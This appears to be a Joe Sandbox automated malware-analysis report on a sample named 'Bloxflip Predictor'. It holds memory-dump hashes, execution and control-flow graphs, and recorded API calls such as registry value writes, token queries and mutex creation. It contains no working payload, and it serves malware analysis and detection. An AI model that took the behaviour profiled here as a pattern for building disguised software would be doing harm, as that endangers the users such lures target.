                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 270d7cc396fcd06b32e958ced2905ead1f8eba282a4bd137672ce6531a9db42a
                                            • Instruction ID: 4af24d6801821d0cff632faa3c68d5f99f8a8de2a6db150c4bce8d72645e5a96
                                            • Opcode Fuzzy Hash: 270d7cc396fcd06b32e958ced2905ead1f8eba282a4bd137672ce6531a9db42a
                                            • Instruction Fuzzy Hash: C5210432B10519CBDB15EB78D8095ED7BE0EFD921871804A9D644EB211EF35DE06C7E1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23e93c06594e88acc2073c59f3ab976dfe383b73aa3e724bd3dc8fd0e34ef505
                                            • Instruction ID: 97d3c2ebd3033aad3fc676d2c81d8c2a34eea649a9679fa7234520a048e3d377
                                            • Opcode Fuzzy Hash: 23e93c06594e88acc2073c59f3ab976dfe383b73aa3e724bd3dc8fd0e34ef505
                                            • Instruction Fuzzy Hash: 33113D72F20205CAFB24E6BDD8421EE7BA6EBD8264F181036D715E3244DB31594186E2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02a10faaac420e73b92754aca15b1770563b9e4a8826ce3ea4c12b7302ecba37
                                            • Instruction ID: 93a3b81e359da329a2a910062cd4f5f90aa601e4a93fee856a72f8b05ce80737
                                            • Opcode Fuzzy Hash: 02a10faaac420e73b92754aca15b1770563b9e4a8826ce3ea4c12b7302ecba37
                                            • Instruction Fuzzy Hash: C321D475B003109FEB25EF78A8157BE3BA3EBD5714F20852AC11593790DB384C15CBA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507524103.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e3d19db459be177aef4702f7f0f0f482fc440c95d7087c53fa0ac88e1bbd3d0
                                            • Instruction ID: ae275e5f8aa15a7a78fbca4952be405eea27dfc8bdf6e16a1aa80bdefe27d013
                                            • Opcode Fuzzy Hash: 0e3d19db459be177aef4702f7f0f0f482fc440c95d7087c53fa0ac88e1bbd3d0
                                            • Instruction Fuzzy Hash: FA11BAB5909341AFD350CF19D840A5BFBE4FB98664F04895EF998D7311D231EA148FA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed73daa93a7057efd2e389161459afe6f43382355fe05111cb51f5da2b1dca5
                                            • Instruction ID: d58ac5c00f3e11b15b4c4b99cbc7d38a40f6481ad5fb26936f0b9d0c6a3646f0
                                            • Opcode Fuzzy Hash: 1ed73daa93a7057efd2e389161459afe6f43382355fe05111cb51f5da2b1dca5
                                            • Instruction Fuzzy Hash: 8E214A311097C08FD7178B64C880B11BFA1AB4A314F2985DED4888B663D33A9906DB52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504090512.0000000001150000.00000040.00000020.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_1150000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dc690c1fa1cf8156dbc560bdd41111e2f924c3bce48ee8da1065cbc84accee
                                            • Instruction ID: 47991f0e9c1be0ea057044b410d35bc77e083d26f8bba595544389a6623b1d28
                                            • Opcode Fuzzy Hash: 05dc690c1fa1cf8156dbc560bdd41111e2f924c3bce48ee8da1065cbc84accee
                                            • Instruction Fuzzy Hash: 0311E131204280DFD759CB94DA40B26BBA1EB8D708F38C99CF8490BB42C73BD803DA52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 747c013c3f7321e5116a71b00e7e6194d82730eb832743eb59f8cf91e03abf6d

                                            Execution Graph

                                            Execution Coverage:18.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:22
                                            Total number of Limit Nodes:1
                                            execution_graph 772 165ae66 774 165ae9e CreateMutexW 772->774 775 165aee1 774->775 800 165ab81 802 165abb2 RegQueryValueExW 800->802 803 165ac3b 802->803 792 165ae32 794 165ae66 CreateMutexW 792->794 795 165aee1 794->795 804 165ac82 805 165aca6 RegSetValueExW 804->805 807 165ad27 805->807 796 165a23c 797 165a25e CloseHandle 796->797 799 165a298 797->799 788 165a25e 789 165a2c9 788->789 790 165a28a CloseHandle 788->790 789->790 791 165a298 790->791 808 165a51a 809 165a54e GetTokenInformation 808->809 811 165a5c0 809->811


                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 299 5760360-576036a 300 5760371-5760392 299->300 301 576036c-576036e 299->301 302 576039d-57603ab 300->302 301->300 304 57603b5-57603b7 302->304 305 57603c1-57603dd 304->305 307 57603e4-57603f3 305->307 308 57603fa-576047f 307->308 319 5760489-57604a1 308->319 321 57604ac-57604ec 319->321 326 57604f3-5760502 321->326 327 5760509-576058e 326->327 338 5760598-57605bd 327->338 342 57605bd call 57605d1 338->342 343 57605bd call 16805e0 338->343 344 57605bd call 1680606 338->344 341 57605c3-57605ca 342->341 343->341 344->341
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 345 5760370-57605bd 387 57605bd call 57605d1 345->387 388 57605bd call 16805e0 345->388 389 57605bd call 1680606 345->389 386 57605c3-57605ca 387->386 388->386 389->386
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 165ae32-165aeb5 4 165aeb7 0->4 5 165aeba-165aec3 0->5 4->5 6 165aec5 5->6 7 165aec8-165aed1 5->7 6->7 8 165aed3-165aef7 CreateMutexW 7->8 9 165af22-165af27 7->9 12 165af29-165af2e 8->12 13 165aef9-165af1f 8->13 9->8 12->13
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0165AED9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 165a51a-165a5b0 21 165a5b2-165a5ba GetTokenInformation 16->21 22 165a5fd-165a602 16->22 24 165a5c0-165a5d2 21->24 22->21 25 165a604-165a609 24->25 26 165a5d4-165a5fa 24->26 25->26
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165A5B8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 29 165ab81-165abef 32 165abf4-165abfd 29->32 33 165abf1 29->33 34 165ac02-165ac08 32->34 35 165abff 32->35 33->32 36 165ac0d-165ac24 34->36 37 165ac0a 34->37 35->34 39 165ac26-165ac39 RegQueryValueExW 36->39 40 165ac5b-165ac60 36->40 37->36 41 165ac62-165ac67 39->41 42 165ac3b-165ac58 39->42 40->39 41->42
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AC2C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 46 165ac82-165ace3 49 165ace5 46->49 50 165ace8-165acf4 46->50 49->50 51 165acf6 50->51 52 165acf9-165ad10 50->52 51->52 54 165ad47-165ad4c 52->54 55 165ad12-165ad25 RegSetValueExW 52->55 54->55 56 165ad27-165ad44 55->56 57 165ad4e-165ad53 55->57 57->56
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AD18
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 61 165ae66-165aeb5 64 165aeb7 61->64 65 165aeba-165aec3 61->65 64->65 66 165aec5 65->66 67 165aec8-165aed1 65->67 66->67 68 165aed3-165aedb CreateMutexW 67->68 69 165af22-165af27 67->69 71 165aee1-165aef7 68->71 69->68 72 165af29-165af2e 71->72 73 165aef9-165af1f 71->73 72->73
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0165AED9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 165abb2-165abef 90 165abf4-165abfd 88->90 91 165abf1 88->91 92 165ac02-165ac08 90->92 93 165abff 90->93 91->90 94 165ac0d-165ac24 92->94 95 165ac0a 92->95 93->92 97 165ac26-165ac39 RegQueryValueExW 94->97 98 165ac5b-165ac60 94->98 95->94 99 165ac62-165ac67 97->99 100 165ac3b-165ac58 97->100 98->97 99->100
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AC2C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0

                                            Control-flow Graph

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165A5B8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0

                                            Control-flow Graph

                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AD18
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0

                                            Control-flow Graph

                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0165A290
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0

                                            Control-flow Graph

                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0165A290
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393965150.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1680000_Bloxflip Predictor.jbxd
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393880178.0000000001652000.00000040.00000800.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1652000_Bloxflip Predictor.jbxd

                                            Execution Graph

                                            Execution Coverage:17.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:22
                                            Total number of Limit Nodes:1

                                            Callgraph


                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd

                                            Control-flow Graph

                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0148AED9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0

                                            Control-flow Graph

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148A5B8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0

                                            Control-flow Graph

                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AC2C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0

                                            Control-flow Graph

                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AD18
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0

                                            Control-flow Graph

                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0148AED9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148A5B8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false

                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AC2C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false

                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AD18
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false

                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0148A290
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false

                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0148A290
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
